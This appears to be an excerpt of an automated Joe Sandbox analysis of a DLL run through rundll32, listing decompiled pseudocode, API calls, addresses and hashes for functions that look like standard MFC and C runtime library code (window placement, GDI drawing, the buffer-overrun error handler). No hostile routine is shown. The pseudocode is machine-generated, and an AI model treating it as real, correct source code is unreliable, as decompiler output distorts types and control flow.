                                                                                                            0x10039f46
                                                                                                            0x10039f49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f29
                                                                                                            0x10039f2c
                                                                                                            0x10039f2f
                                                                                                            0x10039f31
                                                                                                            0x10039f34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f53
                                                                                                            0x10039f58
                                                                                                            0x10039f5b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f63
                                                                                                            0x10039f66
                                                                                                            0x10039f68
                                                                                                            0x10039f6c
                                                                                                            0x10039f6f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f73
                                                                                                            0x10039f76
                                                                                                            0x10039f79
                                                                                                            0x10039f7a
                                                                                                            0x10039f7b
                                                                                                            0x10039f7c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f13
                                                                                                            0x10039f19
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10039f0c
                                                                                                            0x10039f0a
                                                                                                            0x10039e2c
                                                                                                            0x10039e15
                                                                                                            0x10039f87
                                                                                                            0x10039f8d
                                                                                                            0x10039f98

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10039B2B
                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 10039B65
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039DF8
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039E1F
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E83
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039E98
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 10039EAD
                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 10039EE5
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10039EF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 344392101-0
                                                                                                            • Opcode ID: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction ID: b8867a34d175485d2cb2ae4ba9cdbf6ea03067932d09ff1053ffea89e27b22ec
                                                                                                            • Opcode Fuzzy Hash: d95cfa9565d5793f8dd05e0db2e3d08d9b25b9e15aade94b9001d0bb2a7e7cf8
                                                                                                            • Instruction Fuzzy Hash: DBE1697590021ADFDF12CFA8D881AAEBBF5FF45342F214429E951EB261D730AE51CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033FCE Relevance: 19.7, APIs: 13, Instructions: 233windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10033FCE(intOrPtr* __ecx, void* __eflags) {
				void* __esi;
				void* _t132;
				void* _t145;
				intOrPtr* _t226;
				void* _t229;

				E10011BF0(0x1003b231, _t229);
				_t226 = __ecx;
				 *((intOrPtr*)(_t229 - 0x30)) = 0;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x10040668;
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x20)) = 0;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x10040668;
				 *(_t229 - 4) = 2;
				E1000B4EC(_t229 - 0x2c,  *(_t229 + 8));
				CopyRect(_t229 - 0x44,  *(_t229 + 8));
				InflateRect(_t229 - 0x44,  ~( *(_t229 + 0xc)),  ~( *(_t229 + 0x10)));
				IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 8));
				E1002935D(_t229 - 0x24, CreateRectRgnIndirect(_t229 - 0x44));
				E1002935D(_t229 - 0x34, CreateRectRgn(0, 0, 0, 0));
				E10010478(_t229 - 0x34, _t229 - 0x2c, _t229 - 0x24, 3);
				_t235 =  *((intOrPtr*)(_t229 + 0x20));
				if( *((intOrPtr*)(_t229 + 0x20)) == 0) {
					 *((intOrPtr*)(_t229 + 0x20)) = E10033F2F(_t226, _t235);
				}
				if( *((intOrPtr*)(_t229 + 0x24)) == 0) {
					 *((intOrPtr*)(_t229 + 0x24)) =  *((intOrPtr*)(_t229 + 0x20));
				}
				 *((intOrPtr*)(_t229 - 0x18)) = 0;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x10040668;
				 *((intOrPtr*)(_t229 - 0x10)) = 0;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x10040668;
				 *(_t229 - 4) = 4;
				if( *(_t229 + 0x14) != 0) {
					E1002935D(_t229 - 0x1c, CreateRectRgn(0, 0, 0, 0));
					E1001045D(_t229 - 0x2c,  *(_t229 + 0x14));
					CopyRect(_t229 - 0x44,  *(_t229 + 0x14));
					InflateRect(_t229 - 0x44,  ~( *(_t229 + 0x18)),  ~( *(_t229 + 0x1c)));
					IntersectRect(_t229 - 0x44, _t229 - 0x44,  *(_t229 + 0x14));
					E1001045D(_t229 - 0x24, _t229 - 0x44);
					E10010478(_t229 - 0x1c, _t229 - 0x2c, _t229 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4))) {
						E1002935D(_t229 - 0x14, CreateRectRgn(0, 0, 0, 0));
						E10010478(_t229 - 0x14, _t229 - 0x1c, _t229 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x24)) + 4)) &&  *(_t229 + 0x14) != 0) {
					E10028E1A(_t226, _t229 - 0x1c);
					 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
					 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x24)));
					PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
					E10029439(_t226,  *(_t229 + 0x14));
				}
				_t132 = _t229 - 0x14;
				if( *((intOrPtr*)(_t229 - 0x10)) == 0) {
					_t132 = _t229 - 0x34;
				}
				E10028E1A(_t226, _t132);
				 *((intOrPtr*)( *_t226 + 0x50))(_t229 - 0x44);
				 *(_t229 + 0x14) = E10029439(_t226,  *((intOrPtr*)(_t229 + 0x20)));
				PatBlt( *(_t226 + 4),  *(_t229 - 0x44),  *(_t229 - 0x40),  *((intOrPtr*)(_t229 - 0x3c)) -  *(_t229 - 0x44),  *((intOrPtr*)(_t229 - 0x38)) -  *(_t229 - 0x40), 0x5a0049);
				if( *(_t229 + 0x14) != 0) {
					E10029439(_t226,  *(_t229 + 0x14));
				}
				E10028E1A(_t226, 0);
				 *(_t229 - 4) = 3;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x1003eb6c;
				E100293B4(_t229 - 0x14);
				 *(_t229 - 4) = 2;
				 *((intOrPtr*)(_t229 - 0x1c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x1c);
				 *(_t229 - 4) = 1;
				 *((intOrPtr*)(_t229 - 0x24)) = 0x1003eb6c;
				E100293B4(_t229 - 0x24);
				 *(_t229 - 4) = 0;
				 *((intOrPtr*)(_t229 - 0x2c)) = 0x1003eb6c;
				E100293B4(_t229 - 0x2c);
				 *(_t229 - 4) =  *(_t229 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t229 - 0x34)) = 0x1003eb6c;
				_t145 = E100293B4(_t229 - 0x34);
				 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
				return _t145;
			}








                                                                                                            0x10033fd3
                                                                                                            0x10033fe5
                                                                                                            0x10033fe7
                                                                                                            0x10033fea
                                                                                                            0x10033fed
                                                                                                            0x10033ff0
                                                                                                            0x10033ff3
                                                                                                            0x10033ff6
                                                                                                            0x10033ff9
                                                                                                            0x10034002
                                                                                                            0x10034006
                                                                                                            0x10034012
                                                                                                            0x10034028
                                                                                                            0x10034036
                                                                                                            0x1003404a
                                                                                                            0x1003405d
                                                                                                            0x1003406f
                                                                                                            0x10034074
                                                                                                            0x10034077
                                                                                                            0x1003407e
                                                                                                            0x1003407e
                                                                                                            0x10034084
                                                                                                            0x10034089
                                                                                                            0x10034089
                                                                                                            0x1003408c
                                                                                                            0x1003408f
                                                                                                            0x10034092
                                                                                                            0x10034095
                                                                                                            0x1003409b
                                                                                                            0x1003409f
                                                                                                            0x100340b5
                                                                                                            0x100340c0
                                                                                                            0x100340cc
                                                                                                            0x100340e2
                                                                                                            0x100340f0
                                                                                                            0x100340fd
                                                                                                            0x1003410f
                                                                                                            0x10034120
                                                                                                            0x1003412c
                                                                                                            0x1003413e
                                                                                                            0x1003413e
                                                                                                            0x10034120
                                                                                                            0x10034155
                                                                                                            0x10034162
                                                                                                            0x1003416f
                                                                                                            0x10034182
                                                                                                            0x1003419b
                                                                                                            0x100341a2
                                                                                                            0x100341a2
                                                                                                            0x100341aa
                                                                                                            0x100341ad
                                                                                                            0x100341af
                                                                                                            0x100341af
                                                                                                            0x100341b5
                                                                                                            0x100341c2
                                                                                                            0x100341d5
                                                                                                            0x100341ee
                                                                                                            0x100341f3
                                                                                                            0x100341fa
                                                                                                            0x100341fa
                                                                                                            0x10034202
                                                                                                            0x1003420f
                                                                                                            0x10034213
                                                                                                            0x10034216
                                                                                                            0x1003421e
                                                                                                            0x10034222
                                                                                                            0x10034225
                                                                                                            0x1003422d
                                                                                                            0x10034231
                                                                                                            0x10034234
                                                                                                            0x1003423c
                                                                                                            0x1003423f
                                                                                                            0x10034242
                                                                                                            0x10034247
                                                                                                            0x1003424e
                                                                                                            0x10034251
                                                                                                            0x1003425c
                                                                                                            0x10034264

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10033FD3
                                                                                                              • Part of subcall function 1000B4EC: CreateRectRgnIndirect.GDI32(00000000), ref: 1000B4F3
                                                                                                            • CopyRect.USER32 ref: 10034012
                                                                                                            • InflateRect.USER32(?,?,?), ref: 10034028
                                                                                                            • IntersectRect.USER32 ref: 10034036
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10034040
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034053
                                                                                                              • Part of subcall function 10010478: CombineRgn.GDI32(?,?,?,00000003), ref: 1001049B
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100340AF
                                                                                                            • CopyRect.USER32 ref: 100340CC
                                                                                                            • InflateRect.USER32(?,?,?), ref: 100340E2
                                                                                                            • IntersectRect.USER32 ref: 100340F0
                                                                                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 10034126
                                                                                                              • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                                                              • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                                                              • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 1003419B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000000), ref: 1002945B
                                                                                                              • Part of subcall function 10029439: SelectObject.GDI32(?,00000004), ref: 10029471
                                                                                                            • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100341EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prologPattern
                                                                                                            • String ID:
                                                                                                            • API String ID: 897514543-0
                                                                                                            • Opcode ID: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction ID: e5f9903ccf7cdd00105ec8572482158fef9e459befd851420e55a1fcda6e3601
                                                                                                            • Opcode Fuzzy Hash: 400228ba49e4800a67e3a38d3567afe107d057f9fa27c1e0196e875ef419b6f0
                                                                                                            • Instruction Fuzzy Hash: 4191EFB690010DEFCF06DFA4D995CEEBBB9EF08244F51411AF906A7251DB34AE06CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100219DD Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E100219DD(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100202AB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E10007B50(E10007AE5(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006C53();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E10007B50(E10007AE5(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E100204FE(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

























                                                                                                            0x100219dd
                                                                                                            0x100219e5
                                                                                                            0x100219e8
                                                                                                            0x100219f0
                                                                                                            0x100219f3
                                                                                                            0x100219f8
                                                                                                            0x10021a03
                                                                                                            0x10021a15
                                                                                                            0x10021a05
                                                                                                            0x10021a08
                                                                                                            0x10021a08
                                                                                                            0x10021a1b
                                                                                                            0x10021a1f
                                                                                                            0x10021a2b
                                                                                                            0x10021a33
                                                                                                            0x10021a35
                                                                                                            0x10021a35
                                                                                                            0x10021a33
                                                                                                            0x100219fa
                                                                                                            0x100219fa
                                                                                                            0x100219fa
                                                                                                            0x10021a44
                                                                                                            0x10021a4a
                                                                                                            0x10021aea
                                                                                                            0x10021af1
                                                                                                            0x10021af8
                                                                                                            0x10021b02
                                                                                                            0x10021a50
                                                                                                            0x10021a52
                                                                                                            0x10021a57
                                                                                                            0x10021a62
                                                                                                            0x10021a6b
                                                                                                            0x10021a6b
                                                                                                            0x10021a62
                                                                                                            0x10021a6f
                                                                                                            0x10021a76
                                                                                                            0x10021ab7
                                                                                                            0x10021ac6
                                                                                                            0x10021ad3
                                                                                                            0x10021a78
                                                                                                            0x10021a78
                                                                                                            0x10021a7f
                                                                                                            0x10021a81
                                                                                                            0x10021a81
                                                                                                            0x10021a91
                                                                                                            0x10021aa4
                                                                                                            0x10021aae
                                                                                                            0x10021aae
                                                                                                            0x10021a76
                                                                                                            0x10021b11
                                                                                                            0x10021b16
                                                                                                            0x10021b1c
                                                                                                            0x10021b23
                                                                                                            0x10021b26
                                                                                                            0x10021b2d
                                                                                                            0x10021b34
                                                                                                            0x10021b3b
                                                                                                            0x10021b42
                                                                                                            0x10021b47
                                                                                                            0x10021b4e
                                                                                                            0x10021b55
                                                                                                            0x10021b5d
                                                                                                            0x10021b5d
                                                                                                            0x10021b49
                                                                                                            0x10021b49
                                                                                                            0x10021b49
                                                                                                            0x10021b62
                                                                                                            0x10021b6e
                                                                                                            0x10021b76
                                                                                                            0x10021b76
                                                                                                            0x10021b64
                                                                                                            0x10021b64
                                                                                                            0x10021b64
                                                                                                            0x10021b8f

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • GetParent.USER32(?), ref: 10021A08
                                                                                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 10021A2B
                                                                                                            • GetWindowRect.USER32 ref: 10021A44
                                                                                                            • GetWindowLongA.USER32 ref: 10021A57
                                                                                                            • CopyRect.USER32 ref: 10021AA4
                                                                                                            • CopyRect.USER32 ref: 10021AAE
                                                                                                            • GetWindowRect.USER32 ref: 10021AB7
                                                                                                            • CopyRect.USER32 ref: 10021AD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 808654186-0
                                                                                                            • Opcode ID: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction ID: c5023cb8dd4c56e62e69e6e4efe16b58097a74c7fe0422dfe49a5ff72fe10001
                                                                                                            • Opcode Fuzzy Hash: e76da2122a763930bd691be976f21c44a84b6c1e628a4a4a2f822a10c9fdf520
                                                                                                            • Instruction Fuzzy Hash: 9A51AD76A00219AFDB01DBA8DC89FEEBBBDEF48350F154115E901F7281EB30B9458B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016BAA Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 111COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E10016BAA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t41;
				signed int _t54;
				unsigned int _t59;
				void* _t75;
				intOrPtr* _t76;
				signed int _t81;
				char* _t83;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;

				_push(0x118);
				_push(0x10042558);
				E10012514(__ebx, __edi, __esi);
				_t32 =  *0x1004c470; // 0x6edecb8c
				 *((intOrPtr*)(_t88 - 0x1c)) = _t32;
				_t33 =  *0x1004f708; // 0x0
				if(_t33 == 0) {
					if( *((intOrPtr*)(_t88 + 8)) == 1) {
						_t83 = "Buffer overrun detected!";
						 *(_t88 - 0x128) = "A buffer overrun has been detected which has corrupted the program\'s\ninternal state.  The program cannot safely continue execution and must\nnow be terminated.\n";
						_t86 = 0xb9;
					} else {
						_t83 = "Unknown security failure detected!";
						 *(_t88 - 0x128) = "A security error of unknown cause has been detected which has\ncorrupted the program\'s internal state.  The program cannot safely\ncontinue execution and must now be terminated.\n";
						_t86 = 0xd4;
					}
					 *((char*)(_t88 - 0x20)) = 0;
					if(GetModuleFileNameA(0, _t88 - 0x124, 0x104) == 0) {
						E10017B90(_t88 - 0x124, "<program name unknown>");
					}
					_t71 = _t88 - 0x124;
					if(E10011820(_t88 - 0x124) + 0xb > 0x3c) {
						E10019E20(E10011820(_t71) + _t88 - 0xf3, "...", 3);
						_t89 = _t89 + 0x10;
					}
					_t41 = E10011820(_t71);
					_pop(_t75);
					E10010B20(_t41 + _t86 + 0x0000000c + 0x00000003 & 0xfffffffc, _t75);
					 *((intOrPtr*)(_t88 - 0x18)) = _t89;
					_t87 = _t89;
					E10017B90(_t87, _t83);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87, "Program: ");
					E10017BA0(_t87, _t71);
					E10017BA0(_t87, "\n\n");
					E10017BA0(_t87,  *(_t88 - 0x128));
					_push(0x12010);
					_push("Microsoft Visual C++ Runtime Library");
					_push(_t87);
					E10019D1D();
					_t89 = _t89 + 0x3c;
				} else {
					 *(_t88 - 4) = 0;
					 *_t33( *((intOrPtr*)(_t88 + 8)),  *((intOrPtr*)(_t88 + 0xc)));
					 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				}
				E10011F56(3);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t81 =  *(_t89 + 4);
				_t76 =  *((intOrPtr*)(_t89 + 8));
				if((_t81 & 0x00000003) != 0) {
					if((_t81 & 0x00000001) == 0) {
						L27:
						_t54 =  *_t81;
						_t81 = _t81 + 2;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t54 = _t54;
							if(_t54 == 0) {
								goto L21;
							} else {
								if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
									goto L22;
								} else {
									if(_t54 == 0) {
										goto L21;
									} else {
										_t76 = _t76 + 2;
										goto L12;
									}
								}
							}
						}
					} else {
						_t54 =  *_t81;
						_t81 = _t81 + 1;
						if(_t54 !=  *_t76) {
							goto L22;
						} else {
							_t76 = _t76 + 1;
							if(_t54 == 0) {
								goto L21;
							} else {
								if((_t81 & 0x00000002) == 0) {
									goto L12;
								} else {
									goto L27;
								}
							}
						}
					}
				} else {
					while(1) {
						L12:
						_t54 =  *_t81;
						if(_t54 !=  *_t76) {
							break;
						}
						_t54 = _t54;
						if(_t54 == 0) {
							L21:
							return 0;
						} else {
							if(_t54 !=  *((intOrPtr*)(_t76 + 1))) {
								break;
							} else {
								_t59 = _t54;
								if(_t59 == 0) {
									goto L21;
								} else {
									_t54 = _t59 >> 0x10;
									if(_t54 !=  *((intOrPtr*)(_t76 + 2))) {
										break;
									} else {
										_t54 = _t54;
										if(_t54 == 0) {
											goto L21;
										} else {
											if(_t54 !=  *((intOrPtr*)(_t76 + 3))) {
												break;
											} else {
												_t76 = _t76 + 4;
												_t81 = _t81 + 4;
												if(_t54 != 0) {
													continue;
												} else {
													goto L21;
												}
											}
										}
									}
								}
							}
						}
						goto L32;
					}
					L22:
					asm("sbb eax, eax");
					return (_t54 << 1) + 1;
				}
				L32:
			}
















                                                                                                            0x10016baa
                                                                                                            0x10016baf
                                                                                                            0x10016bb4
                                                                                                            0x10016bb9
                                                                                                            0x10016bbe
                                                                                                            0x10016bc1
                                                                                                            0x10016bca
                                                                                                            0x10016bef
                                                                                                            0x10016c07
                                                                                                            0x10016c0c
                                                                                                            0x10016c16
                                                                                                            0x10016bf1
                                                                                                            0x10016bf1
                                                                                                            0x10016bf6
                                                                                                            0x10016c00
                                                                                                            0x10016c00
                                                                                                            0x10016c1b
                                                                                                            0x10016c33
                                                                                                            0x10016c41
                                                                                                            0x10016c47
                                                                                                            0x10016c48
                                                                                                            0x10016c5d
                                                                                                            0x10016c7c
                                                                                                            0x10016c81
                                                                                                            0x10016c81
                                                                                                            0x10016c85
                                                                                                            0x10016c8a
                                                                                                            0x10016c95
                                                                                                            0x10016c9a
                                                                                                            0x10016c9d
                                                                                                            0x10016ca1
                                                                                                            0x10016cad
                                                                                                            0x10016cb8
                                                                                                            0x10016cbf
                                                                                                            0x10016cc6
                                                                                                            0x10016cd2
                                                                                                            0x10016cd7
                                                                                                            0x10016cdc
                                                                                                            0x10016ce1
                                                                                                            0x10016ce2
                                                                                                            0x10016ce7
                                                                                                            0x10016bcc
                                                                                                            0x10016bcc
                                                                                                            0x10016bd5
                                                                                                            0x10016bd9
                                                                                                            0x10016bd9
                                                                                                            0x10016cec
                                                                                                            0x10016cf1
                                                                                                            0x10016cf2
                                                                                                            0x10016cf3
                                                                                                            0x10016cf4
                                                                                                            0x10016cf5
                                                                                                            0x10016cf6
                                                                                                            0x10016cf7
                                                                                                            0x10016cf8
                                                                                                            0x10016cf9
                                                                                                            0x10016cfa
                                                                                                            0x10016cfb
                                                                                                            0x10016cfc
                                                                                                            0x10016cfd
                                                                                                            0x10016cfe
                                                                                                            0x10016cff
                                                                                                            0x10016d00
                                                                                                            0x10016d04
                                                                                                            0x10016d0e
                                                                                                            0x10016d52
                                                                                                            0x10016d6c
                                                                                                            0x10016d6c
                                                                                                            0x10016d6f
                                                                                                            0x10016d74
                                                                                                            0x00000000
                                                                                                            0x10016d76
                                                                                                            0x10016d76
                                                                                                            0x10016d78
                                                                                                            0x00000000
                                                                                                            0x10016d7a
                                                                                                            0x10016d7d
                                                                                                            0x00000000
                                                                                                            0x10016d7f
                                                                                                            0x10016d81
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d83
                                                                                                            0x00000000
                                                                                                            0x10016d83
                                                                                                            0x10016d81
                                                                                                            0x10016d7d
                                                                                                            0x10016d78
                                                                                                            0x10016d54
                                                                                                            0x10016d54
                                                                                                            0x10016d56
                                                                                                            0x10016d5b
                                                                                                            0x00000000
                                                                                                            0x10016d5d
                                                                                                            0x10016d5d
                                                                                                            0x10016d62
                                                                                                            0x00000000
                                                                                                            0x10016d64
                                                                                                            0x10016d6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d6a
                                                                                                            0x10016d62
                                                                                                            0x10016d5b
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d10
                                                                                                            0x10016d14
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016d16
                                                                                                            0x10016d18
                                                                                                            0x10016d40
                                                                                                            0x10016d42
                                                                                                            0x10016d1a
                                                                                                            0x10016d1d
                                                                                                            0x00000000
                                                                                                            0x10016d1f
                                                                                                            0x10016d1f
                                                                                                            0x10016d21
                                                                                                            0x00000000
                                                                                                            0x10016d23
                                                                                                            0x10016d23
                                                                                                            0x10016d29
                                                                                                            0x00000000
                                                                                                            0x10016d2b
                                                                                                            0x10016d2b
                                                                                                            0x10016d2d
                                                                                                            0x00000000
